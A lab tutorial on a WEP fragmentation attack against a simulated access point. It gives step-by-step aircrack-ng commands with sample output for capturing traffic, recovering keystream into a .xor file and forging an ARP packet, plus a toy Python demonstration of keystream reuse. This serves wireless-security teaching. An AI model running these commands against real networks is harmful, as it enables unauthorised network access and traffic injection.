Perform a Fragmentation Attack against a WEP Network


Introduction

In this lab, you will learn how to perform a fragmentation attack against a network encrypted with WEP (Wired Equivalent Privacy). The fragmentation attack is a technique that allows an attacker to obtain a small amount of the WEP keystream (specifically, the Pseudo-Random Generation Algorithm or PRGA) without knowing the WEP key itself.

Once this keystream is obtained, it can be used to create new, valid encrypted packets. These forged packets can then be injected back into the network to stimulate traffic, which is a crucial step in cracking the full WEP key.

You will use the aircrack-ng suite of tools to accomplish this. The process involves monitoring the target network, launching the fragmentation attack to get a PRGA XOR file, and then using that file to forge an ARP packet.

Obtain a Data Packet from the Target AP with airodump-ng

In this step, you will prepare your wireless interface for monitoring and then use airodump-ng to capture traffic from the target Access Point (AP). The goal is to capture at least one data packet, which is required for the fragmentation attack.

First, you need to put your wireless interface into monitor mode. This mode allows the network card to listen to all Wi-Fi traffic in the air, not just traffic addressed to it. We will use the airmon-ng command on the wlan1 interface.

Execute the following command in your terminal:

sudo airmon-ng start wlan1

This command will create a new monitor mode interface, typically named wlan1mon. The output will confirm the new interface name.

PHY     Interface       Driver          Chipset

phy1    wlan1           mac80211_hwsim  Software simulator
                (monitor mode enabled on wlan1mon)

Now, use airodump-ng to find our target AP, "TestWEP", and capture its traffic to a file. We will specify the BSSID (02:00:00:00:00:00), channel (1), and a file prefix (capture) for the output files.

Run this command. Let it run for about 30-60 seconds until you see the #Data count for the AP increase, which indicates data packets are being captured.

sudo airodump-ng --bssid 02:00:00:00:00:00 -c 1 -w capture wlan1mon

You will see an output similar to this. Wait for the #Data column to show a value greater than 0.

 CH  1 ][ Elapsed: 30 s ][ 2023-10-27 10:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC   CIPHER AUTH ESSID

 02:00:00:00:00:00  -30       25        5    1   1  54   WEP   WEP         TestWEP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Once you see that data packets have been captured, press Ctrl+C to stop airodump-ng. You can use the ls command to see the generated capture file, which will be named capture-01.cap.

Start the Fragmentation Attack with aireplay-ng -5

In this step, you will launch the fragmentation attack using aireplay-ng. This attack listens for a packet from the target AP, and once it captures one, it will use it to try and determine the PRGA keystream.

The command for this attack is aireplay-ng -5. You need to specify the BSSID of the target AP with the -b flag and the name of your monitor interface.

Execute the following command to start the attack.

sudo aireplay-ng -5 -b 02:00:00:00:00:00 wlan1mon

After running the command, aireplay-ng will start listening for a suitable packet. The terminal will display a message indicating that it is waiting.

Waiting for a data packet...
Read 221 packets...

The tool will continue to read packets until it finds one that can be used for the attack. In the next step, you will interact with this process once a suitable packet is found. For now, just let it run.

Wait for the 'Use this packet' Message from aircrack-ng

In this step, you will continue the process started with aireplay-ng. After a short while, aireplay-ng should capture a usable packet and will prompt you for confirmation.

The tool will display the packet details and ask if you want to use it.

Waiting for a data packet...
Read 280 packets...
A suitable packet found!
Size: 68
Use this packet? (y/n)

When you see the Use this packet? (y/n) prompt, type y and press Enter.

y

Upon confirmation, aireplay-ng will attempt to reconstruct the PRGA from the packet. If successful, it will save the keystream to a .xor file in your current directory (~/project). The output will look something like this:

Saving chosen packet to replay_src-1027-100500.cap
Trying to get 68 bytes of keystream
Got keystream!!
Saved keystream in fragment-1027-100501.xor
Now you can build a packet with packetforge-ng

This confirms that the attack was successful and the keystream has been saved. The .xor file is the key to forging new packets.
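Why a fragment of keystream is enough, as an added illustration that is not part of the original lab: a toy WEP-style wrapper around a constructed keystream, showing that the PRGA bytes recovered from one packet with guessable plaintext (the introduction's point, and what the .xor file above holds) let anyone holding them produce a ciphertext that passes WEP's CRC-32 integrity check, with the WEP key never involved. The keystream bytes, LLC/SNAP header and packet contents are constructed; RC4 itself is not implemented, because the weakness is keystream reuse under a repeated IV plus an unkeyed ICV, not the cipher's internals.

```python
import zlib

# Constructed 68-byte keystream standing in for the contents of a fragment-*.xor
# file. It is NOT real RC4 output; the point is that nothing below uses a WEP key.
KEYSTREAM = bytes((i * 37 + 11) & 0xFF for i in range(68))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def max_payload(keystream: bytes) -> int:
    """Largest plaintext the keystream can cover once the 4-byte ICV is appended."""
    return len(keystream) - 4


def wep_encrypt(plaintext: bytes, keystream: bytes) -> bytes:
    """WEP-style protection: append the ICV, then XOR with the per-IV keystream."""
    body = plaintext + icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("plaintext plus ICV longer than the available keystream")
    return bytes(b ^ k for b, k in zip(body, keystream))


def wep_decrypt(ciphertext: bytes, keystream: bytes):
    """Reverse the XOR and verify the ICV; return None when the check fails."""
    body = bytes(c ^ k for c, k in zip(ciphertext, keystream))
    data, check = body[:-4], body[-4:]
    return data if icv(data) == check else None


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Ciphertext XOR known (plaintext || ICV) yields the keystream for that IV.
    This is the kind of data aireplay-ng saves to the .xor file."""
    body = known_plaintext + icv(known_plaintext)
    return bytes(c ^ p for c, p in zip(ciphertext, body))


def demo():
    # Constructed station frame: the fixed LLC/SNAP header is the realistic
    # source of known plaintext bytes, the rest is filler.
    known = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"A" * 20
    captured = wep_encrypt(known, KEYSTREAM)
    recovered = recover_keystream(captured, known)      # first 32 keystream bytes
    # Build a different frame under the same IV using only the recovered bytes.
    forged = wep_encrypt(b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"ARP!", recovered)
    # The AP's check (full keystream, ICV verified) accepts it.
    return recovered, forged, wep_decrypt(forged, KEYSTREAM)
```

The ICV still catches accidental corruption (flip any bit of the forged frame and wep_decrypt returns None); what it cannot do is bind the frame to a secret, which is why later Wi-Fi protocols replaced it with a keyed integrity check.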

Generate a PRGA XOR File from the Successful Attack

In this step, you will confirm that the PRGA keystream file was successfully created by the fragmentation attack. This file, which has a .xor extension, contains the piece of the keystream that we recovered.

As you saw in the output from the previous step, aireplay-ng automatically saves the file. You can verify its existence using the ls -l command to list the files in your current directory.

ls -l

The output should show several files, including the capture-01.cap file from airodump-ng and, most importantly, the new .xor file. The filename will vary based on the date and time.

total 20
-rw-r--r-- 1 root root  119 Oct 27 10:02 capture-01.cap
-rw-r--r-- 1 root root   68 Oct 27 10:05 fragment-1027-100501.xor
-rw-r--r-- 1 root root  114 Oct 27 10:01 hostapd-wep.conf
-rw-r--r-- 1 root root   96 Oct 27 10:05 replay_src-1027-100500.cap

The presence of the fragment-*.xor file confirms that you have the necessary component to forge a new packet in the next step.

Use the XOR File to Forge ARP Packets for Injection

In this step, you will use the recovered PRGA keystream to forge a new packet. We will create an ARP request packet using packetforge-ng. This forged packet can then be injected into the network to generate more traffic, which is useful for other attacks like cracking the WEP key.

First, you need to know the MAC address of your attacking interface (wlan1). You can find this with the ip addr command.

ip addr show wlan1

The output will show your MAC address. In this simulated environment, it is 02:00:00:00:01:00.

3: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff

Now, construct the packetforge-ng command.

  • -0: Specifies an ARP request packet.
  • -a: The BSSID of the target AP (02:00:00:00:00:00).
  • -h: The source MAC address (your MAC, 02:00:00:00:01:00).
  • -k: The destination IP address (we'll use a common broadcast IP, 192.168.1.255).
  • -l: The source IP address (we'll use a common source IP, 192.168.1.100).
  • -y: The path to the .xor file. We can use $(ls *.xor) to select the file automatically; this only works while exactly one .xor file is in the directory, so pass the filename explicitly if you have run the attack more than once.
  • -w: The name of the output file for our forged packet, e.g., arp-packet.cap.

Run the command:

packetforge-ng -0 -a 02:00:00:00:00:00 -h 02:00:00:00:01:00 -k 192.168.1.255 -l 192.168.1.100 -y $(ls *.xor) -w arp-packet.cap

The tool will confirm that it has created the packet.

Wrote packet to arp-packet.cap

You have now successfully created a valid, encrypted ARP packet without knowing the WEP key. You can verify its creation with ls. This packet is now ready to be injected into the network.

Summary

In this lab, you successfully performed a WEP fragmentation attack. You have learned a fundamental technique in legacy Wi-Fi security analysis.

You started by setting up a monitor mode interface with airmon-ng and capturing data packets from a target AP using airodump-ng. Then, you launched the core fragmentation attack with aireplay-ng -5, which allowed you to recover a portion of the WEP keystream.

Finally, you used the recovered keystream and packetforge-ng to create a custom, encrypted ARP request packet from scratch. This forged packet is a critical tool for more advanced attacks, such as ARP request replay attacks, which rapidly generate the thousands of packets needed to crack a WEP key.